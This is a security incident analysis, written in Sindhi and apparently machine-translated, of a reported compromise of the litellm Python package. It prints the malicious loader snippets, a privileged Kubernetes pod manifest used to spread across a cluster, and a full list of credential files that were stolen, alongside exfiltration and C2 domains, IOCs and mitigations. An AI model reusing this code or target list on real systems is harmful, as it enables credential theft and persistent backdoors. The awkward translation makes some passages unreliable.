لائيٽ ايل ايل ايم سپلاءِ چين حملو

لائيٽ ايل ايل ايم سپلائي چين حملو: ڪيئن ٽيم پي سي پي اي آءِ انفراسٽرڪچر کي پوئتي رکيو

هي ڇوڪرن کي

24 مارچ 2026 تي، مشهور پٿون پيڪيج لٽيلم، هڪ عالمگير LLM پراڪسي گيٽ وي جيڪو هزارين استعمال ڪن ٿا enterpriseاوپن اي آءِ، اينٿروپڪ، گوگل، ۽ اي ڊبليو ايس بيڊروڪ جهڙن ايپليڪيشنن ۽ اي آءِ فراهم ڪندڙن جي وچ ۾ ٽرئفڪ کي روٽ ڪرڻ لاءِ، پي آءِ پي آءِ تي خاموشي سان سمجهوتو ڪيو ويو. ٻه زهر ٿيل ورجن (1.82.7 ۽ 1.82.8) هڪ ٻئي جي 13 منٽن اندر شايع ٿيا، هڪ ملٽي اسٽيج پيل لوڊ کڻي ويا جيڪي سندون چوري ڪندا هئا، ڪلائوڊ رازن کي خارج ڪندا هئا، ڪبرنيٽس ڪلسٽرن ۾ پاسي کان پکڙيل هئا، ۽ ريموٽ ڪوڊ ايگزيڪيوشن صلاحيتن سان هڪ مستقل پٺاڻ دروازو نصب ڪيو.

لڳ ڀڳ سان روزانو 3.6 ملين ڊائون لوڊ ۽ ڪلائوڊ-نيٽيو AI انفراسٽرڪچر تي گهري تعیناتي، litellm هر ان شيءِ جي سنگم تي بيٺو آهي جيڪا جديد حملي آورن جي خواهش آهي: هر وڏي AI فراهم ڪندڙ لاءِ API ڪيز، ڪلائوڊ IAM سندون، ڪبرنيٽس راز، ۽ SSH ڪيز.

پر ننڍو سمجهوتو ڪو الڳ واقعو نه هو. اهو هڪ جي انتها هئي پنج ڏينهن، پنج ماحولياتي نظام جي مهم هڪ خطري واري اداڪار پاران جيڪو سڃاتو وڃي ٿو ٽيم پي سي پي، هڪ مهم جنهن پهريان سيڪيورٽي اسڪينرز (Aqua Trivy، Checkmarx KICS) کي زهر ڏنو، پوءِ چوري ٿيل استعمال ڪيو CI/CD npm، OpenVSX، ۽ آخرڪار PyPI ۾ هيٺئين وهڪرو کي منتقل ڪرڻ لاءِ سندون. حملي آورن انهن ئي اوزارن کي هٿيار بڻايو جن تي تنظيمون پنهنجي سپلائي چين جي حفاظت لاءِ ڀروسو ڪن ٿيون.

هي حملو سپلائي چين جي خطري جي نفاست ۾ هڪ قدم تبديلي جي نمائندگي ڪري ٿو. ملٽي هاپ، ڪراس ايڪو سسٽم ڊيزائن، اعليٰ قدر تائين پهچڻ لاءِ سيڪيورٽي ٽولنگ سان سمجهوتو ڪري ٿو. AI انفراسٽرڪچر، وڌندڙ ڪموڊائٽائيزڊ حملي جي ٽولنگ سان مطابقت رکندڙ منصوبابندي ۽ آپريشنل پختگي جي سطح کي ظاهر ڪري ٿو. پيل لوڊ حقيقي وقت ۾ ورجايا ويا (ٽي پيل لوڊ قسم سورس ڪوڊ ۾ ظاهر ٿين ٿا، جن ۾ تبصرو ٿيل اڳوڻي ورزن شامل آهن)، حملي کان هڪ ڏينهن اڳ C2 انفراسٽرڪچر رجسٽر ڪيو ويو هو، ۽ جائز وينڊر انفراسٽرڪچر جي نقل ڪرڻ لاءِ ايڪسفلٽريشن ڊومينز کي احتياط سان چونڊيو ويو هو. منظم طور تي جامع سندي هارويسٽر، 15+ ڪيٽيگريز کي ڍڪيندي، جنهن ۾ ڪارڊانو سائننگ ڪيز ۽ وائر گارڊ ڪنفيگس جهڙا خاص هدف شامل آهن، هڪ درجي جي مڪمل طور تي اشارو ڪري ٿو جيڪو AI جي مدد سان مالويئر ڊولپمينٽ کي هڪ فورس ضرب جي طور تي اشارو ڪري ٿو.

مقرر وقت

تاريخ (UTC) واقعي
مارچ 19 ٽيم پي سي پي Aqua Trivy GitHub Action ٽيگ کي ختم ڪري ٿو، انهن کي خراب ڪوڊ سان تبديل ڪري ٿو جيڪو خارج ٿئي ٿو CI/CD هيٺئين وهڪري جي ذخيرن مان راز
مارچ 21 سمجهوتو ساڳئي طريقن کي استعمال ڪندي چيڪ مارڪس KICS ۽ AST GitHub ايڪشن تائين پکڙيل آهي.
22 مارچ، 06:35 BerriAI شايع ڪري ٿو litellm 1.82.6 (آخري صاف نسخو) عام ذريعي CI/CD pipeline جيڪو سيڪيورٽي اسڪيننگ لاءِ ٽريوي استعمال ڪندو آهي
مارچ 23 ٽيم پي سي پي models.litellm.cloud (ايڪسفلٽريشن ڊومين) رجسٽر ڪري ٿو. 66+ npm پيڪيجز ۽ OpenVSX ايڪسٽينشنز سان سمجهوتو ڪري ٿو.
24 مارچ، 10:39 litellm 1.82.7 PyPI تي شايع ٿيل -- پيل لوڊ انجيڪشن ۾ proxy_server.py ماڊيول اسڪوپ تي. درآمد تي عمل ڪري ٿو
24 مارچ، 10:52 litellm 1.82.8 13 منٽ بعد شايع ٿيو -- شامل ڪري ٿو litellm_init.pth، هڪ پٿون رستو ترتيب ڏيڻ وارو ٿلهو جيڪو هر پٿون انٽرپريٽر اسٽارٽ اپ تي عمل ڪري ٿو، صرف لٽيلم درآمد تي نه. تيز پيل لوڊ جي ٻيهر ورڇ ڏيکاري ٿو
24 مارچ، ~ 16:00 ڪميونٽي رپورٽن کان پوءِ PyPI ٻنهي ورجن کي هٽائي ٿو. ورجن انڊيڪس مان مڪمل طور تي ڊهي ويا آهن (ڇڪيا نه ويا آهن)، جيتوڻيڪ CDN ٽاربالز رسائي لائق رهن ٿا.

نمائش جو وقت: لڳ ڀڳ 5.5 ڪلاڪ. هن وقت دوران، ڪو به pip install litellm, pip install --upgrade litellm، يا CI/CD pipeline جديد نسخو ڪڍڻ سان پيل لوڊ عمل ۾ اچي ويندو.

مالويئر ڪيئن داخل ٿيو: ڇرڪائيندڙ سمجهوتو

لٽيلم پيڪيج سڌو سنئون ٽوڙيو نه ويو هو. حملي آور ان تائين هڪ ذريعي پهتو. ٻن-هاپ سپلائي چين حملو:

Aqua Trivy GitHub Action (compromised March 19)     --> LiteLLM CI/CD pipeline runs Trivy without pinned version         --> Malicious Trivy exfiltrates PYPI_PUBLISH token from GitHub Actions runner             --> Attacker publishes poisoned litellm 1.82.7 and 1.82.8 directly to PyPI

لائيٽ ايل ايل ايم جي CI/CD pipeline ٽريوي کي سيڪيورٽي اسڪينر طور استعمال ڪيو - ڪمزورين کي پڪڙڻ لاءِ ٺهيل اوزار پاڻ حملي جو ویکٹر هو. ڇاڪاڻ ته pipeline ٽريوي جو حوالو پن ٿيل جي بدران تبديل ٿيندڙ ٽيگ ذريعي ڏنو ويو آهي commit SHA، سمجھوتو ڪيل عمل خودڪار طريقي سان هليو. بدسلوڪي ٽروي عمل ماحولياتي رازن کي ظاهر ڪيو، جنهن ۾ شامل آهن PYPI_PUBLISH ٽوڪن، ٽيم پي سي پي کي لٽيلم پي پي آءِ پروجيڪٽ تائين سڌي اشاعت جي رسائي ڏئي ٿو.

هي "گارڊن سان سمجهوتو ڪريو" حڪمت عملي ٽيم پي سي پي مهم جي هڪ خاص نشاني آهي. سيڪيورٽي ٽولز کي پهريان نشانو بڻائي (ٽريوي، چيڪ مارڪس ڪي آءِ سي ايس)، حملي آورن هڪ ئي وقت ڳولا کي غير فعال ڪري ڇڏيو ۽ ڊائون اسٽريم سپلائي چينز تائين امتيازي رسائي حاصل ڪئي.

ٽيڪنيڪل تجزيو: پيل لوڊ

انجڪشن پوائنٽس

نسخو 1.82.7 — ماڊيول-سطح جي عملدرآمد ۾ litellm/proxy/proxy_server.py (لائن 128):

import subprocess, base64, sys, tempfile, os  b64_payload = "<~12KB base64 blob>"  with tempfile.TemporaryDirectory() as d:     p = os.path.join(d, "p.py")     with open(p, "wb") as f:         f.write(base64.b64decode(b64_payload))     subprocess.run([sys.executable, p])

هي ڪوڊ ڊڪشنري لٽريل ۽ اصل جي وچ ۾ ماڊيول اسڪوپ تي ويٺو آهي. showwarning() فنڪشن. اهو فوري طور تي عمل ڪري ٿو جڏهن litellm.proxy.proxy_server درآمد ڪيو ويندو آهي - جيڪو لٽيلم جي پراکسي ڪارڪردگي جي ڪنهن به استعمال تي ٿئي ٿو.

نسخو 1.82.8 — شامل ڪيو ويو litellm_init.pth (پائيٿون رستو ترتيب ڏيڻ واري فائل):

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], ...) 

Python .pth فائلون site-packages/ هر مترجم جي شروعات تي پروسيس ڪيو ويندو آهي، پر صرف لائينون جيڪي شروع ٿين ٿيون import ڪوڊ جي طور تي عمل ڪيو ويندو آهي. حملو ڪندڙ سڄي پيل لوڊ کي هڪ سنگل تي زنجير ڪري ان جو استحصال ڪري ٿو import بيان: import os, subprocess, sys; subprocess.Popen(...). هي proxy_server.py انجڪشن کان گهڻو وڌيڪ جارحاڻو آهي - اهو فائر ڪري ٿو جيتوڻيڪ litellm ڪڏهن به درآمد نه ڪيو وڃي، هر پٿون پروسيس لانچ تي. pyproject.toml هن فائل کي ورڇ ۾ شامل ڪرڻ لاءِ تبديل ڪيو ويو:

include = [     { path = "litellm_init.pth", format = ["sdist", "wheel"] } ]

نسخو 1.82.8 ۾ اهڙي طرح آهي ٻه آزاد عملدرآمد جا رستا: proxy_server.py انجڪشن (litellm پراڪسي امپورٽ تي فائر ٿئي ٿو) ۽ .pth فائل (ڪنهن به پٿون اسٽارٽ اپ تي فائر ٿئي ٿو). ريڊنڊنسي پاڻ ۾ قابل ذڪر آهي - اهو صرف ڪنهن به رستي جي ڳولا يا هٽائڻ جي خلاف بچاءُ ڪري ٿو. 1.82.7 کان صرف 13 منٽن بعد درآمد جي وقت کان شروعاتي وقت جي عمل ۾ واڌ مان ظاهر ٿئي ٿو ته حملو ڪندڙ تعیناتي ڪاميابي جي نگراني ڪري رهيو هو ۽ تيزي سان ٻيهر ورجائي رهيو هو.

مرحلو 1: جامع سند جي فصل جي حاصلات

ڊيڪوڊ ٿيل اندروني اسڪرپٽ هڪ محتاط سندي خلا آهي. اهو استعمال ڪري ٿو os.walk()glob.glob()subprocess.check_output()، ۽ سڄي سسٽم کي صاف ڪرڻ لاءِ سڌو فائل پڙهو:

زمرو هدف
سسٽم جي نظرثاني hostname, whoami, uname -a, ip addr, printenv, ip route
ايس ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, config; کان ميزبان چاٻيون /etc/ssh/
ڪلائوڊ (AWS) ~/.aws/credentials, ~/.aws/config; IMDS ڪردار سندون ذريعي 169.254.169.254؛ رازن جو مئنيجر ListSecrets؛ ايس ايس ايم DescribeParameters
ڪلائوڊ (جي سي پي) ~/.config/gcloud/ (ٻيهر ورجائيندڙ)؛ $GOOGLE_APPLICATION_CREDENTIALS
ڪڪر (آزيور) ~/.azure/ (ٻيهر ورجائيندڙ)؛ ماحولياتي متغير
ڪوبنيٿس سروس اڪائونٽ ٽوڪن؛ ca.crt؛ نالي جي جاءِ؛ kubectl get secrets --all-namespaces؛ سڀ راز K8s API ذريعي
ماحولياتي فائلون .env, .env.local, .env.production, .env.development, .env.staging — بار بار ڳولا ڪئي وئي (گہرائي 6) پار /home, /root, /opt, /srv, /var/www, /app, /data, /tmp
Docker ~/.docker/config.json, /kaniko/.docker/config.json
پيڪيج ٽوڪن ~/.npmrc, ~/.vault-token, ~/.netrc
بنيادي دستاويز ~/.pgpass, ~/.my.cnf, /etc/mysql/my.cnf, /etc/redis/redis.conf، مونگو ڊي بي ترتيبون
ٽي ايل ايس/ايس ايس ايل کان خانگي چاٻيون /etc/ssl/private/، اچو ته سرٽيفڪيٽن کي انڪرپٽ ڪريون، سڀ .pem/.key/.p12/.pfx فائلون
Git ~/.git-credentials, ~/.gitconfig
CI/CD terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, Jenkinsfile, ansible.cfg
crypto ويلٽ بِٽ ڪوئن، اِٿيريم ڪي اسٽور، سولانا ڪي پيئرز (تصديق ڪندڙ، ووٽ، اسٽيڪ، نل)، ڪارڊانو سائننگ ڪيز، لِٽيڪوئن، ڊوجي ڪوئن، زڪيش، ڊيش، ريپل، مونيرو
شيل جي تاريخ .bash_history, .zsh_history, .mysql_history, .psql_history, .rediscli_history
سسٽم جي تصديق /etc/passwd, /etc/shadow، تصديق لاگز (قبول ٿيل SSH سيشن)
ويب هُڪ/API ڪيز سليڪ ويب لاءِ گريپhooks، ڊسڪارڊ ويبhooks، ڪنفگ فائلن ۾ API ڪيز/راز
VPN وائر گارڊ ترتيبون کان /etc/wireguard/

هن هارويسٽر جو دائرو انسائيڪلوپيڊيا آهي. اهو صرف ڪلائوڊ سندون نه پر ڪرپٽو ڪرنسي والٽس، ڊيٽابيس پاسورڊ، وي پي اين ترتيبون، ۽ CI/CD راز - اهو مشورو ڏئي ٿو ته حملي آور ڪيترن ئي ویکٹرز ۾ سمجهوتو ڪيل سسٽم کي پئسا ڏيڻ جو ارادو رکي ٿو.

اسٽيج 2: انڪرپٽ ٿيل Exfiltration

چوري ٿيل ڊيٽا کي هائبرڊ انڪرپشن اسڪيم استعمال ڪندي انڪرپٽ ۽ خارج ڪيو ويندو آهي:

  • اي اي ايس-256-سي بي سي سڀني گڏ ڪيل ڊيٽا جي انڪرپشن هڪ بي ترتيب 32-بائيٽ سيشن ڪي سان (ذريعي openssl enc)
  • RSA-4096 حملي آور جي ايمبيڊڊ پبلڪ ڪي استعمال ڪندي سيشن ڪي جي انڪرپشن (OAEP پيڊنگ، ذريعي openssl pkeyutl)
  • ٻئي سائفر ٽيڪسٽ فائلون بنڊل ٿيل آهن جيئن tpcp.tar.gz (يعني tpcp اڳياڙي - "ٽيم پي سي پي" - مهم ۾ مسلسل ظاهر ٿئي ٿو)
  • HTTPS پوسٽ ڪريو https://models.litellm.cloud/ سان Content-Type: application/octet-stream

ڊومين models.litellm.cloud حملي کان هڪ ڏينهن اڳ - 23 مارچ تي رجسٽرڊ ڪيو ويو هو ۽ جائز لٽيلم انفراسٽرڪچر سان ملائي ٺهيل آهي (حقيقي منصوبو استعمال ڪري ٿو litellm.ai). ايستائين جو هڪ نيٽ ورڪ کان واقف محافظ جيڪو ايگريس ٽرئفڪ جو جائزو وٺي رهيو آهي شايد ٽرئفڪ کي ان طرف نه موڪلي جيڪو لٽيلم جو پنهنجو ماڊل اينڊ پوائنٽ لڳي ٿو.

اسٽيج 3: مسلسل پٺتي پيل دروازو (sysmon.py)

پيل لوڊ سسٽم ٽيلي ميٽري جي روپ ۾ هڪ پولنگ پٺئين دروازي کي نصب ڪري ٿو:

  • رستو~/.config/sysmon/sysmon.py
  • خدمتsysmon.service (سسٽم ڊي يوزر يونٽ، "سسٽم ٽيلي ميٽري سروس" جي طور تي بيان ڪيل)
  • رويي: شروعاتي 300 سيڪنڊن جي ننڊ کان پوءِ، پول https://checkmarx.zone/raw هر ~ 50 منٽن ۾
  • Execution: C2 پاران واپس ڪيل URL کي ڊائون لوڊ ڪري ٿو /tmp/pglog، ان کي ايگزيڪيوٽوبل سيٽ ڪري ٿو (chmod 755)، ان کي الڳ ٿيل سيشن ۾ هلائي ٿو
  • رياستي ٽريڪنگ/tmp/.pg_state ساڳئي پيل لوڊ کي ٻيهر ڊائون لوڊ ڪرڻ کان روڪي ٿو
  • تڪليفRestart=alwaysRestartSec=10 - حادثن کان بچي ٿو ۽ ريبوٽ ٿئي ٿو

ڊومين checkmarx.zone چيڪ مارڪس (سيڪيورٽي ڪمپني تي) جو هڪ ٽائيپوسڪوٽ آهي. checkmarx.com)، اهڙي طرح ٺهيل آهي ته نيٽ ورڪ لاگز جو جائزو وٺندڙ SOC تجزيه نگار ٽرئفڪ کي ڏسي سگهن ٿا جيڪو هڪ جائز سيڪيورٽي وينڊر وانگر نظر اچي ٿو. هي هڪ جان بوجھ ڪري چوري ڪرڻ واري ٽيڪنڪ آهي جيڪا ٽيم پي سي پي جي سيڪيورٽي وينڊر برانڊنگ جي پويان لڪائڻ جي وسيع حڪمت عملي سان مطابقت رکي ٿي.

اسٽيج 3b: ڪبرنيٽس جي پس منظر واري حرڪت

جيڪڏهن سمجهوتو ڪيل سسٽم ۾ ڪبرنيٽس سروس اڪائونٽ سندون آهن، ته مالويئر سڀني ڪلسٽر نوڊس کي ڳڻائي ٿو ۽ ڊيپلائي ڪري ٿو امتيازي پوڊز هر هڪ کي:

pod_manifest = {     'apiVersion': 'v1', 'kind': 'Pod',     'metadata': {'name': f'node-setup-{node_name[:35]}', 'namespace': 'kube-system'},     'spec': {         'nodeName': node_name,         'hostPID': True, 'hostNetwork': True,         'tolerations': [{'operator': 'Exists'}],         'containers': [{             'name': 'setup',             'image': 'alpine:latest',             'command': ['sh', '-c', drop_cmd],             'securityContext': {'privileged': True},             'volumeMounts': [{'name': 'host', 'mountPath': '/host'}]         }],         'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}],         'restartPolicy': 'Never'     } }

هر پوڊ:

  • جيئن هلندو آهي امتيازي حيثيت رکندڙ سان hostPIDhostNetwork، ۽ مڪمل هوسٽ فائل سسٽم تائين رسائي
  • استعمال chroot /host ساڳيو انسٽال ڪرڻ لاءِ sysmon.py هوسٽ جي روٽ فائل سسٽم تي پوئين دروازو
  • ان کي سسٽم ڊي سروس جي طور تي رجسٽر ڪري ٿو، يقيني بڻائي ٿو ته پوڊ ڊليٽ ٿيڻ کان پوءِ به مستقل مزاجي برقرار رهي ٿي
  • رکيو ويو node-setup-* ۾ kube-system نالي جي جڳهه کي جائز ڪلسٽر انفراسٽرڪچر طور ظاهر ڪيو وڃي

هن جو مطلب آهي ته هڪ سنگل سمجهوتو ٿيل CI/CD K8s رسائي سان رنر جي نتيجي ۾ ڪلسٽر ۾ هر نوڊ کي پوئتي دروازو ڪيو ويندو. — ڪبرنيٽس ۾ لٽيلم کي پراڪسي طور هلائيندڙ تنظيمن لاءِ هڪ تباهي واري پس منظر واري حرڪت جو منظرنامو.

پيل لوڊ ارتقا (تبصرو ڪيل قسم)

لائين 131-132 تي سورس ڪوڊ ۾ ٻه تبصرو ٿيل اڳئين پيل لوڊ قسم شامل آهن، جيڪي حملي آور جي ترقي جي عمل کي ظاهر ڪن ٿا:

  • سڀ ٽي قسم ساڳي ايڪسفلٽريشن انفراسٽرڪچر شيئر ڪريو (models.litellm.cloud)، RSA-4096 پبلڪ ڪي، AES-256-CBC + RSA هائبرڊ انڪرپشن ريپر، ۽ tpcp.tar.gz بنڊل نالو ڏيڻ
  • اڳوڻا قسم شامل ڪيو آر سي 4 انڪرپشن پرت ڊيٽا گڏ ڪرڻ واري اسڪرپٽ اندر، ٻاهرين AES+RSA ريپر کان اڳ حاصل ڪيل ڊيٽا کي انڪرپٽ ڪندي. فعال پيل لوڊ (لائن 130) هن اندروني RC4 پرت کي هٽائڻ سان آسان بڻايو ويو آهي.
  • اڳوڻا ورجن استعمال ڪن ٿا exec() سان StringIO ڪليڪٽر کي عمل ۾ هلائڻ لاءِ ڪيپچر ڪريو، جڏهن ته فعال پيل لوڊ استعمال ڪندو آهي subprocess.run() stdout ريڊائريڪٽ سان - هڪ صاف علحدگي جيڪا ميزبان عمل کي آلودگي کان بچائي ٿي
  • سڀئي ٽيئي قسم ساڳيا سندي درجابندي ۽ گڏ ڪرڻ جا رستا نشانو بڻائين ٿا.
  • اڳئين ورجن ۾ RC4 ڪي هڪ اشتعال انگيز لفظ هو، جيڪو ٽيليگرام تي اداڪار جي ڌيان ڇڪائيندڙ رويي سان مطابقت رکي ٿو.

هي آپريشن دوران فعال ترقي کي ظاهر ڪري ٿو. حملي آور انڪرپشن اسٽيڪ کي آسان بڻايو ۽ عملدرآمد جي الڳ ٿيڻ کي بهتر بڻايو جڏهن ته ڪليڪشن ٽارگيٽ ۽ ايڪسفلٽريشن انفراسٽرڪچر کي مستحڪم رکيو.

سمجهوتي جا اشارا (IOCs)

نيٽ ورڪ

اشارو قسم مقصد
models.litellm.cloud ڊومين Exfiltration endpoint (HTTPS POST)
checkmarx.zone ڊومين C2 پولنگ اينڊ پوائنٽ (HTTPS GET) /raw)

نوٽ: ٻاهرين رپورٽنگ لنڪس checkmarx.zone/static/checkmarx-util-1.0.4.tgz ٽيم پي سي پي مهم جي اڳوڻي KICS مرحلي ڏانهن. هي URL هتي تجزيو ڪيل لٽيلم پيل لوڊ ۾ نه مليو.

پيڪيج هيشز

عڪس SHA256
litellm-1.82.7.tar.gz 8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea
litellm-1.82.8.tar.gz d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5

فائل سسٽم

اشارو قسم مقصد
~/.config/sysmon/sysmon.py عڪس مسلسل پٺتي پيل اسڪرپٽ
~/.config/systemd/user/sysmon.service عڪس سسٽمڊ پرسسٽنس يونٽ
/tmp/pglog عڪس ڊائون لوڊ ڪيل ٻئي مرحلي جو بائنري
/tmp/.pg_state عڪس سي 2 اسٽيٽ ٽريڪنگ
litellm_init.pth in site-packages/ عڪس پٿون اسٽارٽ اپ ٿلهو (صرف v1.82.8)
tpcp.tar.gz عڪس انڪرپٽ ٿيل ايڪسفلٽريشن بنڊل

ڪوبنيٿس

اشارو قسم مقصد
node-setup-* پوڊس ان kube-system پوڊ امتيازي پس منظر واري حرڪت واري پوڊس
sysmon.service ڪلسٽر نوڊس تي خدمت پوڊ اسڪيپ ذريعي ميزبان-سطح جي استقامت

ڪرپٽوگرافڪ

اشارو تفصيل
حملو ڪندڙ RSA-4096 عوامي چاٻي SHA256 فنگر پرنٽ: bc40e5e2c438032bac4dec2ad61eedd4e7c162a8b42004774f6e4330d8137ba8. ٽنهي پيل لوڊ مختلف قسمن ۾ شامل ڪيو ويو؛ ساڳئي ڪي ٻين ٽيم پي سي پي آپريشنز ۾ رپورٽ ڪئي وئي.
tpcp آثارن ۾ اڳياڙي بنڊل نالي جي ڪنوينشن (tpcp.tar.gz) سڄي مهم ۾ هڪجهڙائي

انتساب: ٽيم پي سي پي

هن مهم جي پويان خطري واري اداڪار کي ٽريڪ ڪيو ويو آهي جيئن ٽيم پي سي پي، جنهن کي PCPcat، Persy_PCP، ShellForce، ۽ DeadCatx3 جي نالي سان پڻ سڃاتو وڃي ٿو.

ڄاتل سڃاتل خاصيتون:

  • ٽيليگرام چينلز کي برقرار رکي ٿو @Persy_PCP ۽ @teampcp جتي انهن سيڪيورٽي ڪمپنين تي طنز ڪيو
  • ڪيترن ئي ماحولياتي نظامن ۾ ڪم ڪري ٿو (GitHub Actions، PyPI، npm، OpenVSX)
  • مهم جي هر مرحلي لاءِ وينڊر مخصوص ٽائپوسڪوٽ ڊومين استعمال ڪري ٿو (مثال طور، checkmarx.zone چيڪ مارڪس لاءِ، models.litellm.cloud ٿوري لاءِ)
  • مسلسل انفراسٽرڪچر مارڪر: ساڳيو RSA ڪي جوڙو، tpcp.tar.gz نالي رکڻ جو رواج، tpcp-docs-* ڊيڊ ڊراپ اسٽيجنگ طور استعمال ٿيندڙ گٽ هب ريپوزٽريز
  • سيڪيورٽي اوزارن کي ڊائون اسٽريم سپلائي چينز ۾ داخلا پوائنٽ طور نشانو بڻائي ٿو

انتساب جو اعتماد: هاءِ. شيئر ٿيل آر ايس اي پبلڪ ڪي، tpcp پنجن ڏينهن جي مهم دوران آرٽيفيڪٽ نالينگ، C2 انفراسٽرڪچر اوورليپ، ۽ آپريشنل ٽيمپو مضبوطيءَ سان ٽريوي، KICS، npm، OpenVSX، ۽ litellm سمجھوتن کي ساڳئي اداڪار سان ڳنڍيندا آهن.

حرڪت: ممڪن مالي (ڪرپٽو والٽ چوري، ڪلائوڊ سند مانيٽائيزيشن) بدنامي سان گڏ (ٽيليگرام طعنو). سند جي حاصلات جي وسعت - AWS IAM کان سولانا تصديق ڪندڙ ڪي پيئرز تائين وائر گارڊ ترتيبن تائين - هڪ مالي طور تي متحرڪ اداڪار جو مشورو ڏئي ٿو جيڪو هر سمجهوتي مان ROI کي وڌائڻ جي ڪوشش ڪري رهيو آهي.

ممڪن AI مدد: سندي هارويسٽر منظم طور تي جامع آهي - 15+ درجا بنديون جن ۾ ڪارڊانو سائننگ ڪيز، وائر گارڊ ڪنفگس، ۽ ڪنيڪو ڊوڪر سندون شامل آهن - هڪ اهڙي طريقي سان جيڪو AI جي مدد سان ڳڻپ سان مطابقت رکي ٿو. پيل لوڊ جي ٻيهر ٿيڻ جي رفتار (مختلف انڪرپشن اسڪيمن سان ٽي قسم)، ڪراس ايڪوسسٽم ڪوآرڊينيشن (5 ڏينهن ۾ 5 ايڪوسسٽم)، ۽ آپريشنل OPSEC (وينڊر-مصنوعي ڊومينز، هائبرڊ انڪرپشن، ٽيلي ميٽري جي روپ ۾ سسٽم ڊي پرسسٽنس) ٿرو پُٽ جي هڪ سطح جو مشورو ڏين ٿا جيڪو AI جي مدد سان ترقي کي فورس ضرب طور ظاهر ڪري سگهي ٿو. هي جائزو قياس آرائي تي ٻڌل آهي؛ ماهر آپريٽر AI ٽولنگ کان سواءِ ساڳيو دائرو حاصل ڪري سگهن ٿا.

نوان ٽي ٽي پي ۽ ٽيڪنڪس

1. سيڪيورٽي ٽول سپلاءِ چين پوائزننگ (T1195.002 قسم)

سيڪيورٽي اسڪينرز (ٽريوي، ڪي آءِ سي ايس) کي ڊائون اسٽريم ٽارگيٽ تائين پهچڻ لاءِ پهرين هاپ جي طور تي سمجهوتو ڪرڻ هڪ نئون واڌارو آهي. حملي آور صرف هڪ لائبريري سان سمجهوتو نه ڪيو - انهن اوزارن سان سمجهوتو ڪيو جيڪي تنظيمون استعمال ڪن ٿيون سڃاڻڻ سمجھوتو ٿيل لائبريريون. هي هڪ انڌي جاءِ پيدا ڪري ٿو: اسڪينر جيڪو خراب ڪوڊ کي پڪڙڻ گهرجي اهو پاڻ پهچائڻ جو طريقو آهي.

2. پئٿون .pth فائل پرسسٽنس (T1546)

هن litellm_init.pth v1.82.8 ۾ ٽيڪنڪ خاص طور تي ٺڳيل آهي. پٿون .pth فائلون site-packages/ هر مترجم جي شروعات تي عمل ڪيو ويندو آهي؛ ڪنهن به لائن سان شروع ٿئي ٿو import ڪوڊ جي طور تي عمل ڪيو ويندو آهي. پيل لوڊ کي هڪ سنگل تي زنجير ڪندي import بيان ۾، حملو ڪندڙ هر پٿون عمل تي عملدرآمد حاصل ڪري ٿو - صرف جڏهن لٽيلم درآمد ڪيو ويندو آهي. ان جو مطلب آهي ته پيل لوڊ فائر ٿئي ٿو جيتوڻيڪ لٽيلم انسٽال ٿيل آهي پر ڪڏهن به استعمال نه ڪيو ويو آهي، ۽ اهو علاج کان بچي ٿو جيڪو سمجھوتي ٿيل کي تبديل ڪري ٿو. .py فائلون بغير چڪاس جي .pth فائلون.

3. ڪبرنيٽس ڪلسٽر-وائڊ ليٽرل موومينٽ ذريعي پرائيويليجڊ پوڊ ڊپلائيمينٽ (T1610، T1611)

هر ڪلسٽر نوڊ تي امتيازي پوڊس جي خودڪار تخليق - سان hostPIDhostNetwork، هوسٽ فائل سسٽم ماؤنٽ، ۽ chroot پرسسٽنس انسٽال ڪرڻ لاءِ — ڪنٽينر ڊيپلائيمينٽ (T1610) کي ايسڪيپ ٽو هوسٽ (T1611) سان زنجيرن ۾ وجهي ٿو ته جيئن هڪ ڪم جي لوڊ کي مڪمل ڪلسٽر ڪم جي لوڊ ۾ تبديل ڪري سگهجي.

4. وينڊر جي نقل ڪندڙ C2 انفراسٽرڪچر

استعمال models.litellm.cloud (litellm جي نقل ڪري ٿو) ۽ checkmarx.zone (چيڪ مارڪڪس جي نقل ڪري ٿو) جيئن C2/exfil اينڊ پوائنٽس نيٽ ورڪ مانيٽرنگ کان بچڻ لاءِ ٺهيل آهي. ايس او سي تجزيه نگار جيڪي ايگريس ٽرئفڪ جو جائزو وٺندا آهن اهي HTTPS ڪنيڪشن ڏسندا جيڪي جائز وينڊر ڊومينز وانگر نظر اچن ٿا.

5. تيز ان-فلائيٽ پيل لوڊ آئٽريشن

اشاعت v1.82.7 درآمد وقت جي عمل سان، پوءِ v1.82.8 شروعاتي وقت جي عمل سان 13 منٽ بعد، حملي آور جي نگراني ۽ موافقت کي حقيقي وقت ۾ ڏيکاري ٿو. تبصرو ٿيل پيل لوڊ مختلف قسم (مختلف انڪرپشن اسڪيمن سان) سورس ڪوڊ ۾ محفوظ ڪيل آپريشن دوران فعال ترقي جي تصديق ڪن ٿا.

ڇا ڪري سگهجي ٿو

هي حملو هر پرت تي اعتماد جو استحصال ڪري ٿو: سيڪيورٽي اوزارن تي اعتماد، پيڪيج رجسٽري تي اعتماد، واقف نظر ايندڙ ڊومينز تي اعتماد، ... CI/CD خودڪار. ان جي خلاف دفاع لاءِ انهن مان هر هڪ اعتماد جي حدن کي سخت ڪرڻ جي ضرورت آهي:

پيڪيج جي صارفين لاءِ

  • صرف ورزن نه پر هيش ذريعي پن انحصار. pip install litellm==1.82.6 --hash=sha256:... جيڪڏهن اهي مختصر طور تي تازي ورزن جي طور تي ظاهر ٿين ها ته به سمجهوتو ٿيل ورجن کي انسٽال ٿيڻ کان روڪي ها.
  • لاڪ فائلون استعمال ڪريو. pip-compilepoetry.lock، ۽ uv.lock صحيح نسخا ۽ هيشز کي پڪڙيو. CI/CD لاڪ فائلن مان انسٽال ڪرڻ گهرجي، نه ته فلوٽنگ ورجن اسپيفائرز مان.
  • جي نگراني .pth فائلون. باقاعدي آڊٽ ڪريو site-packages/ غير متوقع طور تي .pth فائلون - اهي هر پٿون اسٽارٽ اپ تي عمل ڪن ٿيون ۽ هڪ گهٽ تعريف ڪيل استقامت جو طريقو آهن.
